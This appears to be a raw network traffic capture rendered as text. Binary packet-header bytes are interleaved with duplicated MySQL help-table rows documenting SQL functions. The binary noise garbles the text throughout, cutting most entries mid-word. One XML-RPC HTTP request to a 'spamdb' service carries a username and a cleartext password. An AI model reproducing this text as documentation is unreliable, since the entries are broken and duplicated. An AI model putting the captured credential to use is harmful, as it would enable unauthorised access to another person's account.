obtained with\nGET_LOCK(). Returns 1 if the lock was released, 0 if the\nlock wasn\'t locked by this thread (in which case the lock is not released),\nand NULL if the named lock didn\'t exist. The lock does not exist if\nit was never obtained by a call to GET_LOCK() or if it has previously\nbeen released.\n\nThe DO statement is convenient to use with RELEASE_LOCK().\nSee also : [DO, , DO].\n','',''),(293,'IS NULL',26,' IS NULL\n IS NOT NULL\nTests whether a value is or is not NULL.\n','mysql> SEC ZZBi0`EL@/܂Sŀo0E4@? 3 P,ۀ"l )g?C ZZBi0`EL@/܂Sŀo0E4\*@?T 3 P{Z"lh )h_C bb0`BiET@/Ԁo0SE<*@@  3P켋b  )UB STATUS\n\nSHOW ENGINE BDB LOGS displays status information about existing\nBDB log files. It returns the following fields:\n\n\n File\nThe full path to the log file.\n\n Type\nThe log file type (BDB for Berkeley DB log files).\n\n Status\nThe status of the log file (FREE if the file can be removed, or\nIN USE if the file is needed by the transaction subsystem)\n\n \n\nSHOW ENGINE INNODB STATUS displays extensive information about the\nstate of the InnoDB storage engine.\n\nOlder (and now deprecated) synonyms for these statements are SHOW [BDB]\nLOGS and SHOW INNODB STATUS.\n\nSHOW ENGINE can be used as of MySQL 4.1.2.\n','SHOW ENGINE engine_name {LOGS | STATUS }',''),(292,'RELEASE_LOCK',21,' RELEASE_LOCK(str)\nReleases the lock named by the string str that was obtained with\nGET_LOCK(). Returns 1 if the lock was released, 0 if the\nlock wasn\'t locked by this thread (in which case the lock is not released),\nand NULL if the named lock didn\'t exist. The lock does not exist if\nit was never obtained by a call to GET_LOCK() or if it has previously\nbeen released.\n\nThe DO statement is convenient to use with RELEASE_LOCK().\nSee also : [DO, , DO].\n','',''),(293,'IS NULL',26,' IS NULL\n IS NOT NULL\nTests whether a value is or is not NULL.\n','mysql> SEC ZZ0`BiEL@/go0AE4@@ 3 P,ۀ"l )g?C ZZ0`BiEL@/o0  E4\*@@T 3 P{Z"lh )h_C bbBi0`ET@/p܂Ao0E<*@?  3P켑b Z )ULECT 1 IS NULL, 0 IS NULL, NULL IS NULL;\n -> 0, 0, 1\nmysql> SELECT 1 IS NOT NULL, 0 IS NOT NULL, NULL IS NOT NULL;\n -> 1, 1, 0',''),(294,'CONVERT_TZ',14,' CONVERT_TZ(dt,from_tz,to_tz)\n\nCONVERT_TZ()\nconverts a datetime value dt from time zone given by from_tz\nto the time zone given by to_tz and returns the resulting value.\nTime zones may be specified as described in [Time zone support].\nThis function returns NULL if the arguments are invalid.\n','mysql> SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'GMT\',\'MET\');\n -> \'2004-01-01 13:00:00\'\nmysql> SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'+00:00\',\'-07:00\');\n -> \'2004-01-01 05:00:00\'',''),(295,'TIME_TO_SEC',14,' TIME_TO_SEC(time)\nReturns the time argument, converted to seconds.\n','mysql> SELECT TIME_TO_SEC(\'22:23:00\');\n -> 80580\nmysql> SELECT TIME_TO_SEC(\'00:39:38\');\n -> 2378',''),(296,'WEEKDAY',14,' WEEKDAY(date)\nReturns the weekday index for\ndate (0 = Monday, 1 = Tuesday, ... 6 = Sunday).\n','mysql> SELECT WEEKDAY(\'1998-02-03 22:23:00\');\n -> 1\nmysql> SELECT WEEKDAY(\'1997-11-05\');\n -> 2',''),(297,'EXPORT_SET',23,' EXPORT_SET(bits,on,off[,separator[,number_of_bits]])\nReturns a string in which for every bit set in the valC bb0`BiET@/Ԁo0SE<*@@  3P켑b Z )ULECT 1 IS NULL, 0 IS NULL, NULL IS NULL;\n -> 0, 0, 1\nmysql> SELECT 1 IS NOT NULL, 0 IS NOT NULL, NULL IS NOT NULL;\n -> 1, 1, 0',''),(294,'CONVERT_TZ',14,' CONVERT_TZ(dt,from_tz,to_tz)\n\nCONVERT_TZ()\nconverts a datetime value dt from time zone given by from_tz\nto the time zone given by to_tz and returns the resulting value.\nTime zones may be specified as described in [Time zone support].\nThis function returns NULL if the arguments are invalid.\n','mysql> SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'GMT\',\'MET\');\n -> \'2004-01-01 13:00:00\'\nmysql> SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'+00:00\',\'-07:00\');\n -> \'2004-01-01 05:00:00\'',''),(295,'TIME_TO_SEC',14,' TIME_TO_SEC(time)\nReturns the time argument, converted to seconds.\n','mysql> SELECT TIME_TO_SEC(\'22:23:00\');\n -> 80580\nmysql> SELECT TIME_TO_SEC(\'00:39:38\');\n -> 2378',''),(296,'WEEKDAY',14,' WEEKDAY(date)\nReturns the weekday index for\ndate (0 = Monday, 1 = Tuesday, ... 6 = Sunday).\n','mysql> SELECT WEEKDAY(\'1998-02-03 22:23:00\');\n -> 1\nmysql> SELECT WEEKDAY(\'1997-11-05\');\n -> 2',''),(297,'EXPORT_SET',23,' EXPORT_SET(bits,on,off[,separator[,number_of_bits]])\nReturns a string in which for every bit set in the valC_ bbBi0`ET@/p܂Ao0E<*@?  3P켖 b R )Uue bits, you\nget an on string and for every reset bit you get an off\nstring. Bits in bits are examined from right to left (from low-order\nto high-order bits). Strings are added to the result from left to right,\nseparated by the separator string (default \',\'). The number of\nbits examined is given by number_of_bits (default 64).\n','mysql> SELECT EXPORT_SET(5,\'Y\',\'N\',\',\',4);\n -> \'Y,N,Y,N\'\nmysql> SELECT EXPORT_SET(6,\'1\',\'0\',\',\',10);\n -> \'0,1,1,0,0,0,0,0,0,0\'',''),(298,'TIME FUNCTION',14,' TIME(expr)\n\nExtracts the time part of the time or datetime expression expr.\n','mysql> SELECT TIME(\'2003-12-31 01:02:03\');\n -> \'01:02:03\'\nmysql> SELECT TIME(\'2003-12-31 01:02:03.000123\');\n -> \'01:02:03.000123\'',''),(299,'CAST',23,'The CAST() and CONVERT() functions can be used to take a\nvalue of one type and produce a value of another type.\n\nThe type can be one of the following values:\n\n --- BINARY\n --- CHAR\n --- DATE\n --- DATETIME\n --- SIGNED [INTEGER]\n --- TIME\n --- UNSIGNED [INTEGER]\n\nBINARY produces a binary string. See the entry for the BINARY\noperator in this section for a description of how this affects comparisons.\n\nCAST() and CONVERT() are available as of MySQL 4.0.2.\nThe CHAR conversion typeCh ZZBi0`EL@/܂Sŀo0E4@? 3 P6"l )h@C bb0`BiET@/Ԁo0SE<*@@  3P켖 b R )Uue bits, you\nget an on string and for every reset bit you get an off\nstring. Bits in bits are examined from right to left (from low-order\nto high-order bits). Strings are added to the result from left to right,\nseparated by the separator string (default \',\'). The number of\nbits examined is given by number_of_bits (default 64).\n','mysql> SELECT EXPORT_SET(5,\'Y\',\'N\',\',\',4);\n -> \'Y,N,Y,N\'\nmysql> SELECT EXPORT_SET(6,\'1\',\'0\',\',\',10);\n -> \'0,1,1,0,0,0,0,0,0,0\'',''),(298,'TIME FUNCTION',14,' TIME(expr)\n\nExtracts the time part of the time or datetime expression expr.\n','mysql> SELECT TIME(\'2003-12-31 01:02:03\');\n -> \'01:02:03\'\nmysql> SELECT TIME(\'2003-12-31 01:02:03.000123\');\n -> \'01:02:03.000123\'',''),(299,'CAST',23,'The CAST() and CONVERT() functions can be used to take a\nvalue of one type and produce a value of another type.\n\nThe type can be one of the following values:\n\n --- BINARY\n --- CHAR\n --- DATE\n --- DATETIME\n --- SIGNED [INTEGER]\n --- TIME\n --- UNSIGNED [INTEGER]\n\nBINARY produces a binary string. See the entry for the BINARY\noperator in this section for a description of how this affects comparisons.\n\nCAST() and CONVERT() are available as of MySQL 4.0.2.\nThe CHAR conversion typeC ZZ0`BiEL@/go0AE4@@ 3 P6"l )h@C bbBi0`ET@/أ  o0E<@?|  PPZ脀 9 `Qd5you to assign values to TIME columns using either strings or\nnumbers.\n','',''),(249,'&&',20,' AND\n &&\nLogical AND.\nEvaluates to 1 if all operands are non-zero and not NULL,\nto 0 if one or more operands are 0,\notherwise NULL is returned.\n','mysql> SELECT 1 && 1;\n -> 1\nmysql> SELECT 1 && 0;\n -> 0\nmysql> SELECT 1 && NULL;\n -> NULL\nmysql> SELECT 0 && NULL;\n -> 0\nmysql> SELECT NULL && 0;\n -> 0',''),(250,'X',16,' X(p)\nReturns the X-coordinate value for the point p as a double-precision\nnumber.\n','mysql> SELECT X(GeomFromText(\'Point(56.7 53.34)\'));\n+--------------------------------------+\n| X(GeomFromText(\'Point(56.7 53.34)\')) |\n+--------------------------------------+\n| 56.7 |\n+--------------------------------------+',''),(251,'FOUND_ROWS',25,'\nA SELECT statement may include a LIMIT clause to restrict the\nnumber of rows the server returns to the client.\nIn some cases, it is desirable to know how many rows the statement would have\nreturned without the LIMIT, but without running the statement again.\nTo get this row count, include a SQL_CALC_FOUND_ROWS option in the\nSELECT statement, then invoke FOUND_ROWS() afterward:\n','mysql> SELECT SQL_CALC_FOUND_ROWS * FROM tbl_namC bb0`BiET@/o0AE<@@{  PPZ脀 9 `Qd5you to assign values to TIME columns using either strings or\nnumbers.\n','',''),(249,'&&',20,' AND\n &&\nLogical AND.\nEvaluates to 1 if all operands are non-zero and not NULL,\nto 0 if one or more operands are 0,\notherwise NULL is returned.\n','mysql> SELECT 1 && 1;\n -> 1\nmysql> SELECT 1 && 0;\n -> 0\nmysql> SELECT 1 && NULL;\n -> NULL\nmysql> SELECT 0 && NULL;\n -> 0\nmysql> SELECT NULL && 0;\n -> 0',''),(250,'X',16,' X(p)\nReturns the X-coordinate value for the point p as a double-precision\nnumber.\n','mysql> SELECT X(GeomFromText(\'Point(56.7 53.34)\'));\n+--------------------------------------+\n| X(GeomFromText(\'Point(56.7 53.34)\')) |\n+--------------------------------------+\n| 56.7 |\n+--------------------------------------+',''),(251,'FOUND_ROWS',25,'\nA SELECT statement may include a LIMIT clause to restrict the\nnumber of rows the server returns to the client.\nIn some cases, it is desirable to know how many rows the statement would have\nreturned without the LIMIT, but without running the statement again.\nTo get this row count, include a SQL_CALC_FOUND_ROWS option in the\nSELECT statement, then invoke FOUND_ROWS() afterward:\n','mysql> SELECT SQL_CALC_FOUND_ROWS * FROM tbl_namC bbBi0`ET@/p܂Ao0E<*@?  3P켛b &3 )U is available as of 4.0.6.\nThe USING form of CONVERT() is available as of 4.1.0.\n\nCAST() and CONVERT(... USING ...) are standard SQL syntax.\nThe non-USING form of CONVERT() is ODBC syntax.\n\nCONVERT() with USING is used to convert data between different\ncharacter sets. In MySQL, transcoding names are the same as the\ncorresponding character set names. For example, this statement converts\nthe string \'abc\' in the server\'s default character set to the\ncorresponding string in the utf8 character set:\n\nSELECT CONVERT(\'abc\' USING utf8);\n\n \n\nThe cast functions are useful when you want to create a column with\na specific type in a CREATE ... SELECT statement:\n','SELECT enum_col FROM tbl_name ORDER BY CAST(enum_col AS CHAR);',''),(300,'SOUNDS LIKE',23,' expr1 SOUNDS LIKE expr2\n\nThis is the same as SOUNDEX(expr1) = SOUNDEX(expr2). It is\navailable only in MySQL 4.1 or later.\n','',''),(301,'PERIOD_DIFF',14,' PERIOD_DIFF(P1,P2)\nReturns the number of months between periods P1 and P2.\nP1 and P2 should be in the format YYMM or YYYYMM.\nNote that the period arguments P1 and P2 are /not/\ndate values.\n','mysql> SELECT PERIOD_DIFF(9802,199703);\n -> 11',''),(302,'LIKE',23,' expr LIKE pat [ESCAPE \'escape-char\']\nPattern matching using\nSQL simpC ZZBi0`EL@/$T<o0E44@?Q]  Pհ킮ڀ K 1T7=x0C bb0`BiET@/Ԁo0SE<*@@  3P켛b &3 )U is available as of 4.0.6.\nThe USING form of CONVERT() is available as of 4.1.0.\n\nCAST() and CONVERT(... USING ...) are standard SQL syntax.\nThe non-USING form of CONVERT() is ODBC syntax.\n\nCONVERT() with USING is used to convert data between different\ncharacter sets. In MySQL, transcoding names are the same as the\ncorresponding character set names. For example, this statement converts\nthe string \'abc\' in the server\'s default character set to the\ncorresponding string in the utf8 character set:\n\nSELECT CONVERT(\'abc\' USING utf8);\n\n \n\nThe cast functions are useful when you want to create a column with\na specific type in a CREATE ... SELECT statement:\n','SELECT enum_col FROM tbl_name ORDER BY CAST(enum_col AS CHAR);',''),(300,'SOUNDS LIKE',23,' expr1 SOUNDS LIKE expr2\n\nThis is the same as SOUNDEX(expr1) = SOUNDEX(expr2). It is\navailable only in MySQL 4.1 or later.\n','',''),(301,'PERIOD_DIFF',14,' PERIOD_DIFF(P1,P2)\nReturns the number of months between periods P1 and P2.\nP1 and P2 should be in the format YYMM or YYYYMM.\nNote that the period arguments P1 and P2 are /not/\ndate values.\n','mysql> SELECT PERIOD_DIFF(9802,199703);\n -> 11',''),(302,'LIKE',23,' expr LIKE pat [ESCAPE \'escape-char\']\nPattern matching using\nSQL simpC ZZʪBiEL@/o0o0oE44@@Q|  Pհ킮ڀ M 1T7=x0C ZZBi0`EL@/< o0E4@??  PG]nS <eC ZZ0`BiEL@/g܀o0IE4@@>  PG]nS <eC ZZBi0`EL@/܂Sŀo0E4.@?G  PGP6V د aa`t6C( ZZ0`BiEL@/6o0o+PE4.@@G  PGP6V د aa`t6C ZZBi0`EL@/܂Sŀo0E4@? 3 P@"l )iBC ZZ0`BiEL@/go0AE4@@ 3 P@"l )iBC ZZBi0`EL@/< o0E4@?  jP+] spamdb.veryfy_data john-heinze@shop.service.gov staticpassword C 110`BiE#@/ }o0<E @@l  ճP8΁㝀 7=x1TPOST /~spamdb/cgi-bin/server.php HTTP/1.0 User-Agent: XML-RPC for PHP 2.0RC2 Host: 10.7.1.3 Accept-Encoding: gzip, deflate Accept-Charset: UTF-8,ISO-8859-1,US-ASCII Content-Type: text/xml Content-Length: 254 spamdb.veryfy_data john-heinze@shop.service.gov staticpassword C bbBi0`ET@/p܂Ao0E<*@?  3P켠b 09 )Vle regular expression comparison. Returns 1 (TRUE) or 0\n(FALSE). If either expr or pat is NULL, the result is\nNULL.\n\nThe pattern need not be a literal string. For example, it can be specified\nas a string expression or table column.\n\nWith LIKE you can use the following two wildcard characters\nin the pattern:\n\n Character Description\n % Matches any number of characters, even zero characters\n _ Matches exactly one character\n \n','mysql> SELECT \'David!\' LIKE \'David_\';\n -> 1\nmysql> SELECT \'David!\' LIKE \'%D%v%\';\n -> 1',''),(303,'MULTIPOINT',2,' MultiPoint(pt1,pt2,...)\nConstructs a WKB MultiPoint value using WKB Point arguments.\nIf any argument is not a WKB Point, the return value is NULL.\n','',''),(304,'>>',27,' >>\nShifts a longlong (BIGINT) number to the right.\n','mysql> SELECT 4 >> 2;\n -> 1',''),(305,'TRUE FALSE',22,'TRUE and FALSE added as alias for 1 and 0, respectively.\n','',''),(306,'AVG',12,' AVG([DISTINCT] expr)\nReturns the average value of expr.\nThe DISTINCT option can be used as of MySQL 5.0.3 to return the averge\nof the distinct values of expr.\n','mysql> SELECT student_name, AVG(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(307,'MBRWITHIN',8,' MBRWC bb0`BiET@/Ԁo0SE<*@@  3P켠b 09 )Vle regular expression comparison. Returns 1 (TRUE) or 0\n(FALSE). If either expr or pat is NULL, the result is\nNULL.\n\nThe pattern need not be a literal string. For example, it can be specified\nas a string expression or table column.\n\nWith LIKE you can use the following two wildcard characters\nin the pattern:\n\n Character Description\n % Matches any number of characters, even zero characters\n _ Matches exactly one character\n \n','mysql> SELECT \'David!\' LIKE \'David_\';\n -> 1\nmysql> SELECT \'David!\' LIKE \'%D%v%\';\n -> 1',''),(303,'MULTIPOINT',2,' MultiPoint(pt1,pt2,...)\nConstructs a WKB MultiPoint value using WKB Point arguments.\nIf any argument is not a WKB Point, the return value is NULL.\n','',''),(304,'>>',27,' >>\nShifts a longlong (BIGINT) number to the right.\n','mysql> SELECT 4 >> 2;\n -> 1',''),(305,'TRUE FALSE',22,'TRUE and FALSE added as alias for 1 and 0, respectively.\n','',''),(306,'AVG',12,' AVG([DISTINCT] expr)\nReturns the average value of expr.\nThe DISTINCT option can be used as of MySQL 5.0.3 to return the averge\nof the distinct values of expr.\n','mysql> SELECT student_name, AVG(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(307,'MBRWITHIN',8,' MBRWC bbBi0`ET@/أ  o0E<@?|  PPZ脀 0 `Yd?e\n -> WHERE id > 100 LIMIT 10;\nmysql> SELECT FOUND_ROWS();',''),(252,'SYSTEM_USER',25,' SYSTEM_USER()\n\nSYSTEM_USER() is a synonym for USER().\n','',''),(253,'CROSSES',11,' Crosses(g1,g2)\nReturns 1 if g1 spatially crosses g2.\nReturns NULL if g1 is a Polygon or a MultiPolygon,\nor if g2 is a Point or a MultiPoint.\nOtherwise, returns 0.\n\nThe term /spatially crosses/ denotes a spatial relation between two given\ngeometries that has the following properties:\n\n\n --- The two geometries intersect\n\n --- Their intersection results in a geometry that has\na dimension that is one less than the maximum dimension of the two given\ngeometries\n\n --- Their intersection is not equal to either of the two given geometries\n','',''),(254,'TRUNCATE TABLE',6,'TRUNCATE TABLE empties a table completely.\nLogically, this is equivalent to a DELETE statement that deletes all\nrows, but there are practical differences under some circumstances.\n\nFor InnoDB before version 5.0.3, TRUNCATE TABLE is\nmapped to DELETE, so there is no difference. Starting with\nMySQL/InnoDB-5.0.3, fast TRUNCATE TABLE is available. The\noperation is still mapped to DELETE if there are foreign\nkey constraints that reference the table.\n\nFor other storage engines, TRUNCATE TABLE differs from\nDC bb0`BiET@/o0AE<@@{  PPZ脀 0 `Yd?e\n -> WHERE id > 100 LIMIT 10;\nmysql> SELECT FOUND_ROWS();',''),(252,'SYSTEM_USER',25,' SYSTEM_USER()\n\nSYSTEM_USER() is a synonym for USER().\n','',''),(253,'CROSSES',11,' Crosses(g1,g2)\nReturns 1 if g1 spatially crosses g2.\nReturns NULL if g1 is a Polygon or a MultiPolygon,\nor if g2 is a Point or a MultiPoint.\nOtherwise, returns 0.\n\nThe term /spatially crosses/ denotes a spatial relation between two given\ngeometries that has the following properties:\n\n\n --- The two geometries intersect\n\n --- Their intersection results in a geometry that has\na dimension that is one less than the maximum dimension of the two given\ngeometries\n\n --- Their intersection is not equal to either of the two given geometries\n','',''),(254,'TRUNCATE TABLE',6,'TRUNCATE TABLE empties a table completely.\nLogically, this is equivalent to a DELETE statement that deletes all\nrows, but there are practical differences under some circumstances.\n\nFor InnoDB before version 5.0.3, TRUNCATE TABLE is\nmapped to DELETE, so there is no difference. Starting with\nMySQL/InnoDB-5.0.3, fast TRUNCATE TABLE is available. The\noperation is still mapped to DELETE if there are foreign\nkey constraints that reference the table.\n\nFor other storage engines, TRUNCATE TABLE differs from\nDC6 bbBi0`ET@/p܂Ao0E<*@?  3P켥"b  )Vithin(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangle\nof g1 is within the Minimum Bounding Rectangle of g2.\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Polygon((0 0,0 5,5 5,5 0,0 0))\');\nmysql> SELECT MBRWithin(@g1,@g2), MBRWithin(@g2,@g1);\n+--------------------+--------------------+\n| MBRWithin(@g1,@g2) | MBRWithin(@g2,@g1) |\n+--------------------+--------------------+\n| 1 | 0 |\n+--------------------+--------------------+',''),(308,'IN',26,' expr IN (value,...)\nReturns 1 if expr is any of the values in the IN list,\nelse returns 0. If all values are constants, they are\nevaluated according to the type of expr and sorted. The search for the\nitem then is done using a binary search. This means IN is very quick\nif the IN value list consists entirely of constants. If expr\nis a case-sensitive string expression, the string comparison is performed in\ncase-sensitive fashion.\n','mysql> SELECT 2 IN (0,3,5,\'wefwf\');\n -> 0\nmysql> SELECT \'wefwf\' IN (0,3,5,\'wefwf\');\n -> 1',''),(309,'QUOTE',23,' QUOTE(str)\nQuotes a string to produce a result that can be used as a properly escaped\ndata value in an SQL statement. ThC@ ZZBi0`EL@/܂Sŀo0E4@? 3 PU"lŗ )jJCX bb0`BiET@/Ԁo0SE<*@@  3P켥"b  )Vithin(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangle\nof g1 is within the Minimum Bounding Rectangle of g2.\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Polygon((0 0,0 5,5 5,5 0,0 0))\');\nmysql> SELECT MBRWithin(@g1,@g2), MBRWithin(@g2,@g1);\n+--------------------+--------------------+\n| MBRWithin(@g1,@g2) | MBRWithin(@g2,@g1) |\n+--------------------+--------------------+\n| 1 | 0 |\n+--------------------+--------------------+',''),(308,'IN',26,' expr IN (value,...)\nReturns 1 if expr is any of the values in the IN list,\nelse returns 0. If all values are constants, they are\nevaluated according to the type of expr and sorted. The search for the\nitem then is done using a binary search. This means IN is very quick\nif the IN value list consists entirely of constants. If expr\nis a case-sensitive string expression, the string comparison is performed in\ncase-sensitive fashion.\n','mysql> SELECT 2 IN (0,3,5,\'wefwf\');\n -> 0\nmysql> SELECT \'wefwf\' IN (0,3,5,\'wefwf\');\n -> 1',''),(309,'QUOTE',23,' QUOTE(str)\nQuotes a string to produce a result that can be used as a properly escaped\ndata value in an SQL statement. ThCh ZZ0`BiEL@/go0AE4@@ 3 PU"lŗ )jJC bbBi0`ET@/p܂Ao0E<*@?  3P켪*b  )We string is returned surrounded by single\nquotes and with each instance of single quote (\'\'\'), backslash (\'\\\'),\nASCII NUL, and Control-Z preceded by a backslash. If the argument is\nNULL, the return value is the word ``NULL\'\' without surrounding\nsingle quotes.\nThe QUOTE() function was added in MySQL 4.0.3.\n','mysql> SELECT QUOTE(\'Don\\\'t!\');\n -> \'Don\\\'t!\'\nmysql> SELECT QUOTE(NULL);\n -> NULL',''),(310,'SESSION_USER',25,' SESSION_USER()\n\nSESSION_USER() is a synonym for USER().\n','',''),(311,'QUARTER',14,' QUARTER(date)\nReturns the quarter of the year for date, in the range 1\nto 4.\n','mysql> SELECT QUARTER(\'98-04-01\');\n -> 2',''),(312,'POSITION',23,' POSITION(substr IN str)\n\nPOSITION(substr IN str) is a synonym for LOCATE(substr,str).\n','mysql> SELECT LOCATE(\'bar\', \'foobarbar\');\n -> 4\nmysql> SELECT LOCATE(\'xbar\', \'foobar\');\n -> 0\nmysql> SELECT LOCATE(\'bar\', \'foobarbar\',5);\n -> 7',''),(313,'IS_USED_LOCK',21,' IS_USED_LOCK(str)\nChecks whether the lock named str is in use (that is, locked).\nIf so, it returns the connection identifier of the client that holds\nthe lock.\nOtherwise, it returns NULL.\n','',''),(314,'POLYFROMTEXT',3,' PolyFromText(wkt[,srid])\n PolygonFrC! ZZBi0`EL@/< o0E4@?  jP+]>c 6 \7=x(C: bb0`BiET@/Ԁo0SE<*@@  3P켪*b  )We string is returned surrounded by single\nquotes and with each instance of single quote (\'\'\'), backslash (\'\\\'),\nASCII NUL, and Control-Z preceded by a backslash. If the argument is\nNULL, the return value is the word ``NULL\'\' without surrounding\nsingle quotes.\nThe QUOTE() function was added in MySQL 4.0.3.\n','mysql> SELECT QUOTE(\'Don\\\'t!\');\n -> \'Don\\\'t!\'\nmysql> SELECT QUOTE(NULL);\n -> NULL',''),(310,'SESSION_USER',25,' SESSION_USER()\n\nSESSION_USER() is a synonym for USER().\n','',''),(311,'QUARTER',14,' QUARTER(date)\nReturns the quarter of the year for date, in the range 1\nto 4.\n','mysql> SELECT QUARTER(\'98-04-01\');\n -> 2',''),(312,'POSITION',23,' POSITION(substr IN str)\n\nPOSITION(substr IN str) is a synonym for LOCATE(substr,str).\n','mysql> SELECT LOCATE(\'bar\', \'foobarbar\');\n -> 4\nmysql> SELECT LOCATE(\'xbar\', \'foobar\');\n -> 0\nmysql> SELECT LOCATE(\'bar\', \'foobarbar\',5);\n -> 7',''),(313,'IS_USED_LOCK',21,' IS_USED_LOCK(str)\nChecks whether the lock named str is in use (that is, locked).\nIf so, it returns the connection identifier of the client that holds\nthe lock.\nOtherwise, it returns NULL.\n','',''),(314,'POLYFROMTEXT',3,' PolyFromText(wkt[,srid])\n PolygonFrCK ZZʪBiEL@/o0o0oE4@@  jP+]>c 6 \7=x(C ZZBiʪEL@/o0oo0E4H@@ Pj>c+] C 7=x\C ZZ0`BiEL@/c+] C 7=x\C ZZBi0`EL@/܂Sŀo0E4@? 3 P_+"l )jJC ZZ0`BiEL@/go0AE4@@ 3 P_+"l )jJCu bbBi0`ET@/p܂Ao0E<*@?  3P켯2b U& )WomText(wkt[,srid])\nConstructs a POLYGON value using its WKT representation and SRID.\n','',''),(315,'DES_ENCRYPT',17,' DES_ENCRYPT(str[,(key_num|key_str)])\n\nEncrypts the string with the given key using the Triple-DES algorithm.\nOn error, this function returns NULL.\n\nNote that this function works only if MySQL has been configured with\nSSL support. See also : [Secure connections].\n\nThe encryption key to use is chosen based on the second argument to\nDES_ENCRYPT(), if one was given:\n\n Argument Description\n No argument \nThe first key from the DES key file is used.\n key_num \nThe given key number (0-9) from the DES key file is used.\n key_str \nThe given key string is used to encrypt str.\n \n\nThe key file can be specified with the --des-key-file server option.\n\nThe return string is a binary string where the first character\nis CHAR(128 | key_num).\n\nThe 128 is added to make it easier to recognize an encrypted key.\nIf you use a string key, key_num is 127.\n\nThe string length for the result is\nnew_len = orig_len + (8-(orig_len % 8))+1.\n','key_num des_key_str',''),(316,'LENGTH',23,' LENGTH(str)\nReturns the length of the string str, measured in bytes.\nA multi-byte character counts as multiple bytes.\nThis means that for a string conC bb0`BiET@/Ԁo0SE<*@@  3P켯2b U& )WomText(wkt[,srid])\nConstructs a POLYGON value using its WKT representation and SRID.\n','',''),(315,'DES_ENCRYPT',17,' DES_ENCRYPT(str[,(key_num|key_str)])\n\nEncrypts the string with the given key using the Triple-DES algorithm.\nOn error, this function returns NULL.\n\nNote that this function works only if MySQL has been configured with\nSSL support. See also : [Secure connections].\n\nThe encryption key to use is chosen based on the second argument to\nDES_ENCRYPT(), if one was given:\n\n Argument Description\n No argument \nThe first key from the DES key file is used.\n key_num \nThe given key number (0-9) from the DES key file is used.\n key_str \nThe given key string is used to encrypt str.\n \n\nThe key file can be specified with the --des-key-file server option.\n\nThe return string is a binary string where the first character\nis CHAR(128 | key_num).\n\nThe 128 is added to make it easier to recognize an encrypted key.\nIf you use a string key, key_num is 127.\n\nThe string length for the result is\nnew_len = orig_len + (8-(orig_len % 8))+1.\n','key_num des_key_str',''),(316,'LENGTH',23,' LENGTH(str)\nReturns the length of the string str, measured in bytes.\nA multi-byte character counts as multiple bytes.\nThis means that for a string conC NNBi0`E@@/Plo0E(I@b k  P-H0lPC NN0`BiE@@/X:o0E(I@@ k  P-H0lPC\ bbBi0`ET@/p܂Ao0E<*@?  3P켴:b ԥ )Wtaining five two-byte characters,\nLENGTH() returns 10, whereas CHAR_LENGTH() returns\n5.\n','mysql> SELECT LENGTH(\'text\');\n -> 4',''),(317,'DISTANCE',11,' Distance(g1,g2)\nReturns as a double-precision number\nthe shortest distance between any two points in the two geometries.\n','',''),(318,'STR_TO_DATE',14,' STR_TO_DATE(str,format)\nThis is the reverse function of the DATE_FORMAT() function. It takes a\nstring str and a format string format.\nSTR_TO_DATE() returns a DATETIME value if the format\nstring contains both date and time parts, or a DATE or TIME\nvalue if the string contains only date or time parts.\n\nThe date, time, or datetime values contained in str should be given\nin the format indicated by format. For the specifiers that can be\nused in format, see the table in the DATE_FORMAT() function\ndescription. All other characters are just taken verbatim, thus not being\ninterpreted.\nIf str contains an illegal date, time, or datetime value,\nSTR_TO_DATE() returns NULL. Starting from MySQL 5.0.3, an\nillegal value also produces a warning.\n','@c next example commented out until format string becomes optional\n@c mysql> SELECT STR_TO_DATE(\'2003-10-03\');\n@c -> 2003-10-03 00:00:00\nmysql> SELECT STR_TO_DATE(\'03.10.2003 09.20\',\n -Cw bb0`BiET@/Ԁo0SE<*@@  3P켴:b ԥ )Wtaining five two-byte characters,\nLENGTH() returns 10, whereas CHAR_LENGTH() returns\n5.\n','mysql> SELECT LENGTH(\'text\');\n -> 4',''),(317,'DISTANCE',11,' Distance(g1,g2)\nReturns as a double-precision number\nthe shortest distance between any two points in the two geometries.\n','',''),(318,'STR_TO_DATE',14,' STR_TO_DATE(str,format)\nThis is the reverse function of the DATE_FORMAT() function. It takes a\nstring str and a format string format.\nSTR_TO_DATE() returns a DATETIME value if the format\nstring contains both date and time parts, or a DATE or TIME\nvalue if the string contains only date or time parts.\n\nThe date, time, or datetime values contained in str should be given\nin the format indicated by format. For the specifiers that can be\nused in format, see the table in the DATE_FORMAT() function\ndescription. All other characters are just taken verbatim, thus not being\ninterpreted.\nIf str contains an illegal date, time, or datetime value,\nSTR_TO_DATE() returns NULL. Starting from MySQL 5.0.3, an\nillegal value also produces a warning.\n','@c next example commented out until format string becomes optional\n@c mysql> SELECT STR_TO_DATE(\'2003-10-03\');\n@c -> 2003-10-03 00:00:00\nmysql> SELECT STR_TO_DATE(\'03.10.2003 09.20\',\n -CP ZZBi0`EL@/܂Sŀo0E4@? 3 Pi;"lu )kKCi ZZ0`BiEL@/go0AE4@@ 3 Pi;"lu )kKC bbBi0`ET@/p܂Ao0E<*@?  3P켹Bb D )W> \'%d.%m.%Y %H.%i\');\n -> \'2003-10-03 09:20:00\'\nmysql> SELECT STR_TO_DATE(\'10arp\', \'%carp\');\n -> \'0000-10-00 00:00:00\'\nmysql> SELECT STR_TO_DATE(\'2003-15-10 00:00:00\',\n -> \'%Y-%m-%d %H:%i:%s\');\n -> NULL',''),(319,'Y',16,' Y(p)\nReturns the Y-coordinate value for the point p as a double-precision\nnumber.\n','mysql> SELECT Y(GeomFromText(\'Point(56.7 53.34)\'));\n+--------------------------------------+\n| Y(GeomFromText(\'Point(56.7 53.34)\')) |\n+--------------------------------------+\n| 53.34 |\n+--------------------------------------+',''),(320,'NUMINTERIORRINGS',0,' NumInteriorRings(poly)\nReturns the number of interior rings in the Polygon value poly.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 